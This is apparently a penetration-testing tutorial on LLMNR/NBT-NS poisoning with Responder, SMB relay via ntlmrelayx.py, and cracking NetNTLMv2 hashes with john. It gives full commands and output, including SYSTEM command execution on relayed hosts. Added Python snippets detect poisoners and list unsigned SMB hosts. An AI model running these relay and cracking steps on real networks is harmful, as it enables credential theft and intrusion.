Background
LLMNR and NBT-NS poisoning combined with an SMB relay is a common way to compromise a Windows host: the captured NetNTLM hashes are either cracked offline or relayed to another host for authentication. This method is usually used when I can't find critical vulns like MS17-010. An SMB relay attack requires a Windows host to try to resolve an SMB share name (or another Windows authentication target), which makes the host fall back to an LLMNR/NBT-NS broadcast that the attacker machine answers. The attacker runs Responder, listening on the common ports and waiting to capture the SMB hashes.
From experience, a relay attack is usually a waiting game and a matter of chance: you start Responder to poison the network's LLMNR and NBT-NS requests and, at the same time, run a multi-relayer like ntlmrelayx.py to relay the SMB hashes to a list of victim hosts. Then you wait and pray for a catch. In a large network you are bound to get a bite within minutes.
Remember that SMB signing must be turned off (not required) on the victim before this attack will work, so the best thing to do is to fingerprint the victim hosts first.
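From the defender's side, the same fallback is what makes the poisoning easy to detect: an LLMNR query for a name that cannot exist should never be answered, so any reply comes from a poisoner. The following probe is an added example, not part of the original post or of Responder; it builds the LLMNR query in DNS message format (RFC 4795), multicasts it to 224.0.0.252:5355 and reports which source addresses answered. The canary name prefix and the two-second timeout are assumptions.

```python
import random
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # RFC 4795 multicast group/port

def build_llmnr_query(name, txid):
    """DNS-format LLMNR query for an A record: header, QNAME labels, QTYPE=A, QCLASS=IN."""
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)

def _skip_name(msg, off):
    """Offset just past a DNS name at `off`, handling 0xC0xx compression pointers."""
    while msg[off] != 0 and msg[off] & 0xC0 != 0xC0:
        off += 1 + msg[off]                 # skip one label
    return off + (2 if msg[off] else 1)     # pointer is 2 bytes, terminator is 1

def parse_llmnr_answers(msg, txid):
    """IPv4 addresses from the A answers of a response whose ID matches `txid`."""
    if len(msg) < 12:
        return []
    rid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    if rid != txid or not flags & 0x8000:   # wrong transaction or not a response
        return []
    off = 12
    for _ in range(qd):
        off = _skip_name(msg, off) + 4      # skip QTYPE and QCLASS too
    addrs = []
    for _ in range(an):
        off = _skip_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            addrs.append(socket.inet_ntoa(msg[off:off + 4]))
        off += rdlen
    return addrs

def probe_for_poisoner(timeout=2.0):
    """Ask for a random name that cannot exist; map responder IP -> addresses it claimed."""
    txid, name = random.randrange(0x10000), f"canary-{random.getrandbits(32):08x}"  # assumed prefix
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    hits = {}
    try:
        while True:                         # collect replies until the timeout expires
            data, (src, _port) = sock.recvfrom(512)
            hits.setdefault(src, []).extend(parse_llmnr_answers(data, txid))
    except socket.timeout:
        pass
    return hits                             # {} on a clean segment
```

A non-empty result maps the poisoner's source IP to the address it claimed for the canary name (Responder answers with its own IP), which is what to feed into an alert.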
Enumeration Steps
On the attacker machine, run Responder to listen for incoming connections. Note: if you intend to use responder-MultiRelay, edit /usr/share/responder/Responder.conf and disable:
SMB server
HTTP server
# responder -I eth0 -rwd
Successful start of Responder on the attacker machine:
NBT-NS, LLMNR & MDNS Responder 2.3.3.9
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CRTL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [OFF]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [OFF]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [eth0]
Responder IP [172.16.6.11]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Listening for events...
Once Responder is running, it automatically saves the captured SMB hashes into /usr/share/responder/logs/; the hashes there can be cracked with john or hashcat. But we would like to relay the hash to the victim hosts to execute our evil deeds. I couldn't get responder-MultiRelay to work, so I am using ntlmrelayx.py.
First comes the enumeration bit: I identify the hosts with SMB signing turned off using this command:
# responder-RunFinger -i 172.16.16.0/24 -g > smb-hosts.txt
['172.16.16.64', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.63', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:26', Null Session: True, MS17-010: False]
['172.16.16.66', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.34', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.74', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.77', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.79', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.80', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:26', Null Session: True, MS17-010: False]
['172.16.16.71', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.70', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:26', Null Session: True, MS17-010: False]
['172.16.16.89', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.76', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.56', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
With a bit of awk, cut or sed, whichever you prefer, extract the IP addresses of the hosts whose Signing field is False into a target file. Match the Signing field itself; a bare grep for False would also hit the MS17-010: False field on every line:
# grep "Signing:'False'" smb-hosts.txt | cut -d \' -f2 > targets.txt
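As an added example (not the post's own script), here is a Python parser for the RunFinger grep-mode output shown above. It reads the Signing field rather than matching any False on the line, produces the same host list that targets.txt holds, and turns the same scan into a findings list for the remediation report (SMB signing not required, null sessions, MS17-010). The sample lines are constructed, not the post's hosts.

```python
import re

# Constructed sample in RunFinger "-g" output format (not the post's hosts).
SAMPLE = """\
['10.0.0.64', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'corp', Signing:'False', Time:'2019-01-24 13:58:25', Null Session: True, MS17-010: False]
['10.0.0.10', Os:'indows Server 2012 R2 Standard 9600', Domain:'corp', Signing:'True', Time:'2019-01-24 13:58:25', Null Session: False, MS17-010: False]
['10.0.0.77', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'corp', Signing:'False', Time:'2019-01-24 13:58:26', Null Session: True, MS17-010: True]
"""

# One RunFinger line: ['ip', Os:'..', Domain:'..', Signing:'..', Time:'..', Null Session: .., MS17-010: ..]
LINE_RE = re.compile(
    r"\['(?P<ip>\d+\.\d+\.\d+\.\d+)',\s*Os:'(?P<os>[^']*)',\s*Domain:'(?P<domain>[^']*)',"
    r"\s*Signing:'(?P<signing>True|False)',\s*Time:'(?P<time>[^']*)',"
    r"\s*Null Session:\s*(?P<null_session>True|False),\s*MS17-010:\s*(?P<ms17_010>True|False)\]"
)

def parse_runfinger(text):
    """Parse RunFinger grep-mode output into one dict per host; unmatched lines are skipped."""
    hosts = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            d = m.groupdict()
            for key in ("signing", "null_session", "ms17_010"):
                d[key] = d[key] == "True"   # normalise the quoted/unquoted booleans
            hosts.append(d)
    return hosts

def signing_disabled(hosts):
    """IPs where SMB signing is not required: the relayable set, and the hardening list.
    A bare `grep False` would match every line here because of the MS17-010 field."""
    return [h["ip"] for h in hosts if not h["signing"]]

def findings(hosts):
    """(ip, issue) pairs for the report: unsigned SMB, null sessions, unpatched MS17-010."""
    out = []
    for h in hosts:
        if not h["signing"]:
            out.append((h["ip"], "SMB signing not required"))
        if h["null_session"]:
            out.append((h["ip"], "SMB null session allowed"))
        if h["ms17_010"]:
            out.append((h["ip"], "MS17-010 not patched"))
    return out

if __name__ == "__main__":
    parsed = parse_runfinger(SAMPLE)
    print("\n".join(signing_disabled(parsed)))   # same role as targets.txt
    for ip, issue in findings(parsed):
        print(f"{ip}\t{issue}")
```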
Multi Relay Attack
After formatting the targets, feed the file into ntlmrelayx.py:
# ntlmrelayx.py -tf targets.txt -c whoami
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to hosts in targetfile
[*] Setting up SMB Server
[*] Servers started, waiting for connections
[*] Setting up HTTP Server
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.20.241
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.20.241 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.27
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.27 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.28
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.26
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.28 as xxx\xxx SUCCEED
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.20.248
[*] Authenticating against smb://172.16.21.26 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.13
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.20.248 as xxx\xxx SUCCEED
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.16
[*] Authenticating against smb://172.16.21.13 as xxx\xxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.17
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.9 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Executed specified command on host: 172.16.21.17
nt authority\system
[*] Stopping service RemoteRegistry
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.0
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.0 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.3
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.20.253
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
If ntlmrelayx.py was successful, you should get command execution on the hosts; as you can see above, whoami returned a result. From here, you can target the specific victim and directly invoke a meterpreter or Empire agent on the machine, or any evil cmd:
# ntlmrelayx.py -t 172.16.21.17 -c dir
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.17
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.17 as xxxx\xxxx SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Executed specified command on host: 172.16.21.17
Volume in drive C has no label.
Volume Serial Number is 806C-3558
Directory of C:\Windows\system32
24/01/2019 01:27 PM <DIR> .
24/01/2019 01:27 PM <DIR> ..
21/11/2010 03:06 PM <DIR> 0409
19/12/2007 06:40 AM 3,774 2hps.ico
30/07/2013 02:10 PM 21,824 accelerometerdll.DLL
21/11/2010 11:24 AM 3,745,792 accessibilitycpl.dll
14/07/2009 09:24 AM 39,424 ACCTRES.dll
14/07/2009 09:40 AM 9,216 acledit.dll
14/07/2009 09:40 AM 154,112 aclui.dll
................
Cracking Hash
If the multi relay did not work for you, don't give up yet; you can always try cracking the hashes:
# cd /usr/share/responder/logs/
# ls
Analyzer-Session.log Responder-Session.log SMB-Relay-SMB-192.168.197.135.txt
Config-Responder.log SMB-Relay-192.168.197.135.txt SMBv2-NTLMv2-SSP-192.168.197.135.txt
HTTP-NTLMv2-192.168.197.135.txt SMBRelay-Session.txt
Poisoners-Session.log SMB-Relay-SMB-192.168.197.133.txt
Let's feed them into john:
# john SMB* --wordlist=/tmp/wordlist.txt
Using default input encoding: UTF-8
Loaded 10 password hashes with 10 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Remaining 8 password hashes with 8 different salts
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxxxx (user01)
xxxxxxxx (user01)
xxxxxxxx (user01)
xxxxxxxx (user01)
xxxxxxxx (user01)
xxxxxxxx (user01)
xxxxxxxx (user01)
qqqqqqqq (Administrator)
8g 0:00:00:00 DONE (2019-01-23 15:25) 800.0g/s 100.0p/s 800.0c/s 800.0C/s xxxxxxx
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Summary
There you go folks: Responder and multi-relay attacks should be part of your pen-testing arsenal, so remember to try them in your next engagement.